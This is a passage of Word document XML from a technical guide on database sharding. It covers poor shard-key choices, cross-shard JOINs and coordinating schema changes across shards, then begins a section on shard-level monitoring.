      </w:r>
    </w:p>
    <w:p w14:paraId="4A71387C" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  2. Hot spots: most writes go to 'pending' (all new orders are pending)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7490D93E" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">     Shard 1 is hot, Shard 4 (completed) is cold</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73EB0473" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  3. Growth: completed orders grow indefinitely, Shard 4 keeps growing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A16A365" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  4. Status changes: moving from pending → processing → shipped requires cross-shard move</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="718717A8" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">     DELETE from pending shard, INSERT to processing shard (cross-shard operation)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66A36A2F" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">     </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="262D8B7B" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Fix: shard by user_id (high cardinality, stable, collocates user's order history)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C4CB192" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Status-based queries → scatter-gather (acceptable if infrequent analytics)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6544F73E" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Or: maintain status-based views in a separate analytics system</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21CDF11F" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520"/>
    <w:p w14:paraId="74A805CE" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Anti-pattern: shard by date for current data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CF39DFA" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520"/>
    <w:p w14:paraId="5900809F" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Table: events, shard key: date (daily partitions)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="035336E5" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Today's shard: all writes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A6DAE95" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Yesterday's shard: all reads (mostly)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CCF573B" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Historical shards: cold</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49525FC1" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78304979" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Hot spot: today's shard receives 100% of writes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F7FA968" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  No write scaling benefit (all writes still on one shard)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F92DDC4" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="105259BC" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Fix: shard by (user_id, date) for event tables</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4249373F" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Or: shard by user_id, partition within shard by date</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DD93D56" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Or: use BRIN/range partitioning (same machine) instead of sharding</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6212D0BA" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Anti-Pattern 3: Cross-Shard JOIN in Hot Path</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06DE4A2A" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18CFD187" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Query on hot path: product recommendations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77A5D838" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  SELECT p.name, p.price, r.rating_avg</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3064D4AE" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  FROM products p</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="273FE643" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  JOIN ratings r ON p.id = r.product_id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59716404" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  WHERE p.category_id = 5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E16D8D3" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  ORDER BY r.rating_avg DESC LIMIT 10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D88FBA7" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B2B302E" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  products sharded by product_id (hash)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12E40797" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  ratings sharded by product_id (hash, same key — good!)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5103EC25" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E871B70" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Same shard key → JOIN can be shard-local (both tables share partition key)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="403462EA" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Each shard executes JOIN locally, VTGate merges results</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34C392EF" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  ✓ Efficient</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DE8B231" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7308D3B2" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Anti-pattern:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34AE41F6" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  products sharded by product_id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C253C3B" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  ratings sharded by user_id (ratings sharded differently than products!)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B84704F" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02D56E7B" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  JOIN: for each product on Shard 1, ratings could be anywhere</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50FC07C0" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  → Broadcast JOIN: fetch all relevant ratings from all shards</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FC22AE3" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  → N × M rows transferred across network (N=product shards, M=rating shards)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06F44B04" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  → Catastrophic at scale</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64EE985D" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="305825AA" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Fix options:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40A9CA97" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  1. Shard both tables by the same key (product_id)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CCDE8E8" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  2. Denormalize: embed rating_avg in products table → no JOIN needed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="126CF542" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">     (update rating_avg asynchronously when new ratings arrive)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7909AACE" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  3. Materialize the JOIN result in a separate table (read-only, pre-computed)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02EAAC22" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  4. Move cross-shard analytics to data warehouse (Snowflake, BigQuery, Redshift)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FDA3B3C" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">     where distributed JOINs are the primary use case and optimized for it</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="721F776A" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Anti-Pattern 4: Schema Changes Without Coordination</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C350FC6" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AAAF8EB" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Problem: DDL changes must be applied to all shards</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C1C2EFA" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520"/>
    <w:p w14:paraId="10432456" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>ALTER TABLE orders ADD COLUMN discount_pct DECIMAL(5,2) DEFAULT 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AD59FED" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520"/>
    <w:p w14:paraId="70653923" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>On a 20-shard cluster:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="764DDF3C" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Run on Shard 1: ALTER TABLE... (2 minutes, table lock)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2479F3D0" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Run on Shard 2: ALTER TABLE... (2 minutes)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="758B4581" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  ...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AF668FC" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Run on Shard 20: ALTER TABLE... (2 minutes)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A2686F4" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13141EC7" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Total: 40 minutes of serial schema changes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05ED6D7F" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  During this time: application code must handle both old and new schemas</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="008E5345" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  → Columns that don't exist on some shards → queries fail on those shards</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F1D1F08" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520"/>
    <w:p w14:paraId="4B3C731D" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Correct approach:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6918F2A1" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  1. Expand-contract pattern:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D20F52F" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">     Step 1 (expand): ADD COLUMN discount_pct DECIMAL(5,2) DEFAULT 0 (backward compatible)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="746AFF16" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">       Apply to all shards before deploying new application code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47C8E84D" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">       Old application code: ignores the new column (doesn't break)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0184AED0" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">       New application code: reads and writes the new column</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A33170F" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">       </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75088ED0" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">     Step 2 (deploy application): deploy code that uses new column</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="645BAA3C" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">       Works on all shards (column already exists everywhere)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B9EB68F" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">       </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02CE61F9" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">     Step 3 (contract, if needed): DROP old column (after old code no longer references it)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42912EA7" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">       Apply to all shards after old code is fully retired</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56B7820E" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">       </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59052535" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  2. Online schema changes (pt-online-schema-change, gh-ost for MySQL):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35713F17" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">     Adds column WITHOUT table lock:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="548E3137" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">       Create a shadow table with new schema</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E02FF57" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">       Copy existing rows to shadow table (background, throttled)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="040AB02F" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">       Replicate new writes to both tables (trigger-based or binlog-based)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2915AD0E" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">       Swap tables atomically when copy completes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F9CAB7B" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">       </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="786B6CC4" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  3. Schema versioning:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C38884C" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">     Application handles both old and new schema versions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FD1B76F" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">     Deploy schema change → deploy application version that reads both</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B76DF6A" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">     Once all shards migrated → deploy application version that reads only new schema</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A65A0ED" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:pict w14:anchorId="456B4F89">
          <v:rect id="_x0000_i5862" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="67DB7F82" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>9. Observability and Operations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AB78F24" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Shard-Level Monitoring</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EFB4E05" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29ECC58C" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Metrics per shard (aggregated and per-shard breakdowns):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B635A62" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520"/>
    <w:p w14:paraId="2D8F493B" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
